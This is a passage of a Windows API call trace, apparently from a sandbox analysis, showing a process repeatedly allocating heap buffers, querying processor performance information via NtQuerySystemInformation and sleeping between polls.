SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.956] Sleep (dwMilliseconds=0x110) [0217.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.977] Sleep (dwMilliseconds=0x110) [0217.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0217.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0217.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0217.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0217.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0217.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0217.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0217.986] Sleep (dwMilliseconds=0x110) [0217.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0217.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.004] Sleep (dwMilliseconds=0x110) [0218.027] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.027] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.028] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.036] Sleep (dwMilliseconds=0x110) [0218.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.050] Sleep (dwMilliseconds=0x110) [0218.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.071] Sleep (dwMilliseconds=0x110) [0218.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.083] Sleep (dwMilliseconds=0x110) [0218.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.098] Sleep (dwMilliseconds=0x110) [0218.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.110] Sleep (dwMilliseconds=0x110) [0218.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.126] Sleep (dwMilliseconds=0x110) [0218.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.144] Sleep (dwMilliseconds=0x110) [0218.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.161] Sleep (dwMilliseconds=0x110) [0218.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 